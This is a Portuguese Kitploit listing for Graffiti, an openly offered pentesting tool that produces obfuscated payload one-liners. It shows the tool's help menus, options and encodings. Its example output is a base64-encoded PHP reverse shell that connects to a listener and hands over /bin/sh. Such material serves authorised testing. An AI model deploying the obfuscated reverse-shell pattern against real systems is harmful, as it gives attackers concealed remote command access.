Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Graffiti — Uma ferramenta para gerar one-liners ofuscados para auxiliar em testes de penetração. | Kitploit
Ferramentas/GitHubGitHub/ekultek/graffiti
Geração de PayloadsShellcodeTestes de PenetraçãoDesenvolvimento de Payloads
GitHubekultek/graffiti

Graffiti

Uma ferramenta para gerar one-liners ofuscados para auxiliar em testes de penetração.

Ver Repositório
180443há 7 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

graffitibanner

NOTA: Nunca faça upload de payloads para verificadores online

Graffiti é uma ferramenta para gerar oneliners ofuscados para auxiliar em situações de teste de penetração. Graffiti aceita os seguintes idiomas para codificação:

  • Python
  • Perl
  • Batch
  • Powershell
  • PHP
  • Bash

Graffiti também aceitará um idioma que não esteja atualmente na lista e armazenará o oneliner em um banco de dados.

Funcionalidades

Graffiti vem completo com um banco de dados que irá inserir cada payload codificado nele, a fim de permitir que os usuários finais visualizem payloads já criados para uso futuro. Os payloads podem ser codificados usando as seguintes técnicas:

  • Xor
  • Base64
  • Hex
  • ROT13
  • Raw

Algumas funcionalidades do Graffiti incluem:

  • Acesso direto ao terminal, com a capacidade de executar comandos externos
  • Capacidade de criar seus próprios arquivos JSON de payload
  • Capacidade de visualizar payloads em cache no banco de dados
  • Capacidade de executar o banco de dados na memória para exclusão rápida
  • Histórico do terminal e salvamento do histórico do terminal
  • Auto-completar por tab dentro do terminal
  • Capacidade de limpar de forma segura os arquivos de histórico e o arquivo de banco de dados
  • Múltiplas técnicas de codificação como mencionado acima
  • Uso

    Graffiti vem com um terminal embutido; quando você não passa nenhuma bandeira para o programa, ele entra no terminal. O terminal tem histórico, a capacidade de executar comandos externos e seus próprios comandos internos. Para obter ajuda, basta digitar help ou ?:

    root@kitploit:~
    
      ________              _____  _____.__  __  .__ 
     /  _____/___________ _/ ____\/ ____\__|/  |_|__|
    /   \  __\_  __ \__  \\   __\\   __\|  \   __\  |
    \    \_\  \  | \// __ \|  |   |  |  |  ||  | |  |
     \______  /__|  (____  /__|   |__|  |__||__| |__|
            \/           \/           
     v(0.1)               
    
    no arguments have been passed, dropping into terminal type `help/?` to get help, all commands that sit inside of `/bin` are available in the terminal
    root@graffiti:~/graffiti# ?
    
     Command                                  Description
    ---------                                --------------
     help/?                                  Show this help
     external                                List available external commands
     cached                                  Display all payloads that are already in the database
     list/show                               List all available payloads
     search <phrase>                         Search for a specific payload
     use <payload> <coder>                   Use this payload and encode it using a specified coder
     info <payload>                          Get information on a specified payload
     check                                   Check for updates
     history                                 Display command history
     exit/quit                               Exit the terminal and running session
     encode <script-type> <coder>            Encode a provided payload
    
    root@graffiti:~/graffiti# help
    
     Command                                  Description
    ---------                                --------------
     help/?                                  Show this help
     external                                List available external commands
     cached                                  Display all payloads that are already in the database
     list/show                               List all available payloads
     search <phrase>                         Search for a specific payload
     use <payload> <coder>                   Use this payload and encode it using a specified coder
     info <payload>                          Get information on a specified payload
     check                                   Check for updates
     history                                 Display command history
     exit/quit                               Exit the terminal and running session
     encode <script-type> <coder>            Encode a provided payload
    

    Graffiti também vem com argumentos de linha de comando para quando você precisa de um payload codificado rapidamente:

    root@kitploit:~
    usage: graffiti.py [-h] [-c CODEC] [-p PAYLOAD]
                       [--create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS]
                       [-l]
                       [-P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]]]
                       [-lH LISTENING-ADDRESS] [-lP LISTENING-PORT] [-u URL] [-vC]
                       [-H] [-W] [--memory] [-mC COMMAND [COMMAND ...]]
    
    optional arguments:
      -h, --help            show this help message and exit
      -c CODEC, --codec CODEC
                            specify an encoding technique (*default=None)
      -p PAYLOAD, --payload PAYLOAD
                            pass the path to a payload to use (*default=None)
      --create PAYLOAD SCRIPT-TYPE PAYLOAD-TYPE DESCRIPTION OS
                            create a payload file and store it inside of
                            ./etc/payloads (*default=None)
      -l, --list            list all available payloads by path (*default=False)
      -P [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]], --personal-payload [PAYLOAD [SCRIPT-TYPE,PAYLOAD-TYPE,DESCRIPTION ...]]
                            pass your own personal payload to use for the encoding
                            (*default=None)
      -lH LISTENING-ADDRESS, --lhost LISTENING-ADDRESS
                            pass a listening address to use for the payload (if
                            needed) (*default=None)
      -lP LISTENING-PORT, --lport LISTENING-PORT
                            pass a listening port to use for the payload (if
                            needed) (*default=None)
      -u URL, --url URL     pass a URL if needed by your payload (*default=None)
      -vC, --view-cached    view the cached data already present inside of the
                            database
      -H, --no-history      do not store the command history (*default=True)
      -W, --wipe            wipe the database and the history (*default=False)
      --memory              initialize the database into memory instead of a .db
                            file (*default=False)
      -mC COMMAND [COMMAND ...], --more-commands COMMAND [COMMAND ...]
                            pass more external commands, this will allow them to
                            be accessed inside of the terminal commands must be in
                            your PATH (*default=None)
    

    Codificar um payload é simples assim:

    root@kitploit:~
    root@graffiti:~/graffiti# python graffiti.py -c base64 -p /linux/php/socket_reverse.json -lH 127.0.0.1 -lP 9065
    Encoded Payload:
    --------------------------------------------------
    
    php -r 'exec(base64_decode("JHNvY2s9ZnNvY2tvcGVuKCIxMjcuMC4wLjEiLDkwNjUpO2V4ZWMoIi9iaW4vc2ggLWkgPCYzID4mMyAyPiYzIik7"));'
    
    --------------------------------------------------
    

    Uma demonstração do Graffiti pode ser encontrada aqui:

    to_video

    Instalação

    Em qualquer sistema Linux, Mac ou Windows, o Graffiti deve funcionar imediatamente sem a necessidade de instalar pacotes externos. Se você quiser instalar o Graffiti como um executável no seu sistema (você deve estar executando Linux ou Mac para que funcione corretamente), basta fazer o seguinte:

    root@kitploit:~
    ./install.sh
    

    Isso instalará o Graffiti no seu sistema e permitirá que você o execute de qualquer lugar.

    Bugs e problemas

    Se você encontrar um bug ou problema, por favor crie uma issue com detalhes aqui e agradeço antecipadamente!

    Baixar ferramenta